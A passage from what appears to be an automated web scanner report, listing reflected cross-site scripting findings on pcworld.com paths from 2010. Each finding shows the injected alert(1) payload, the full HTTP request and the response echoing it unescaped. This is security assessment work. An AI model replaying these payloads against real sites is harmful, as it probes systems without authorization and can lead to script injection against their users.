                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
mail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/cell_phones_voip24593'-alert(1)-'3f83e2d88cd/cell_phones.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.44. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac10b"><a>a7c172bf8c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/cell_phones_voip/cell_phones.htmlac10b"><a>a7c172bf8c7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=099C52BBFCE40E15EF0CA7647F08B590; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:42:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
y:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/cell_phones_voip/cell_phones.htmlac10b"><a>a7c172bf8c7"/>
...[SNIP]...

1.45. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b5e'-alert(1)-'91a3468e022 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/cell_phones_voip/cell_phones.html37b5e'-alert(1)-'91a3468e022 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:03 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/cell_phones_voip/cell_phones.html37b5e'-alert(1)-'91a3468e022';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.46. http://www.pcworld.com/businesscenter/index/office_hardware.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71d3d'-alert(1)-'2751cb2a281 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/office_hardware.html71d3d'-alert(1)-'2751cb2a281 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4EEA58D7998E8C5D641A20A1A2DB48E8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:50 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
= pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware.html71d3d'-alert(1)-'2751cb2a281';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.47. http://www.pcworld.com/businesscenter/index/office_hardware.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1f8"><script>alert(1)</script>bf48b0f0986 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /businesscenter/index/office_hardware.htmlde1f8"><script>alert(1)</script>bf48b0f0986 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A88C52CD11DCB9119F8AE29A661550FD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/office_hardware.htmlde1f8"><script>alert(1)</script>bf48b0f0986"/>
...[SNIP]...

1.48. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e79f9"><a>c3cb83bdc67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardwaree79f9"><a>c3cb83bdc67/printers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:18 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2E501C37E550E762D607A3AE378BB2AA; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/office_hardwaree79f9"><a>c3cb83bdc67/printers.html"/>
...[SNIP]...

1.49. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9713'-alert(1)-'ba7f19ad7a3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/office_hardwarec9713'-alert(1)-'ba7f19ad7a3/printers.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:32 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=78420FEF70A9CC9E5E18C671BE289D1E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:32 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
Email = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardwarec9713'-alert(1)-'ba7f19ad7a3/printers.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.
...[SNIP]...

1.50. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed9a3'-alert(1)-'d62d91c468f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/office_hardware/printers.htmled9a3'-alert(1)-'d62d91c468f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9B5164F238777CB2E67C2812CB1D0C54; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:49 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
adCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware/printers.htmled9a3'-alert(1)-'d62d91c468f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.51. http://www.pcworld.com/businesscenter/index/office_hardware/printers.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/printers.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37ca8"><a>c2922f46311 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardware/printers.html37ca8"><a>c2922f46311 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5B99149D866339F3E62FD22C33D0EC3D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
splay:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/office_hardware/printers.html37ca8"><a>c2922f46311"/>
...[SNIP]...

1.52. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd12"><a>998397dc8ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardware5bd12"><a>998397dc8ea/tablets.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:40 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/office_hardware5bd12"><a>998397dc8ea/tablets.html"/>
...[SNIP]...

1.53. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86d0a'-alert(1)-'7c12061bbf1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/office_hardware86d0a'-alert(1)-'7c12061bbf1/tablets.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:44:52 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=52FBCBEA979D0BEA6BA595DEA53F3DFC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:52 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
Email = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware86d0a'-alert(1)-'7c12061bbf1/tablets.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.l
...[SNIP]...

1.54. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ee90"><a>ed15d72cfea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/office_hardware/tablets.html2ee90"><a>ed15d72cfea HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3F6F33428F27CAF4C20C93E2AE1FF9BE; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:53 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
isplay:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/office_hardware/tablets.html2ee90"><a>ed15d72cfea"/>
...[SNIP]...

1.55. http://www.pcworld.com/businesscenter/index/office_hardware/tablets.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/office_hardware/tablets.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86f6b'-alert(1)-'3cebc29110c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/office_hardware/tablets.html86f6b'-alert(1)-'3cebc29110c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D064911C8EF6EAC04B14CF4830DE2FC5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:06 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
eadCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/office_hardware/tablets.html86f6b'-alert(1)-'3cebc29110c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.56. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ae75'-alert(1)-'f572c4d253d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/operating_systems5ae75'-alert(1)-'f572c4d253d/linux_unix.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:46:05 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=CD9F6840F9463B41CF465693455607D2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:04 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/operating_systems5ae75'-alert(1)-'f572c4d253d/linux_unix.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pc
...[SNIP]...

1.57. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46012"><a>071b612e1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/operating_systems46012"><a>071b612e1d/linux_unix.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:45:40 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:45:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
mg style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/operating_systems46012"><a>071b612e1d/linux_unix.html"/>
...[SNIP]...

1.58. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7d18'-alert(1)-'2ed455a770c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /businesscenter/index/operating_systems/linux_unix.htmlc7d18'-alert(1)-'2ed455a770c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DCEC59128B31E1CEC344D97FB2E6803; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:19 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/operating_systems/linux_unix.htmlc7d18'-alert(1)-'2ed455a770c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.59. http://www.pcworld.com/businesscenter/index/operating_systems/linux_unix.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/businesscenter/index/operating_systems/linux_unix.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d31a"><a>9d91ed19f41 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/operating_systems/linux_unix.html3d31a"><a>9d91ed19f41 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
y:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&url=/businesscenter/index/operating_systems/linux_unix.html3d31a"><a>9d91ed19f41"/>
...[SNIP]...

1.60. http://www.pcworld.com/businesscenter/index/security.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/businesscenter/index/security.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b07d6"><script>alert(1)</script>60b33eb97b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

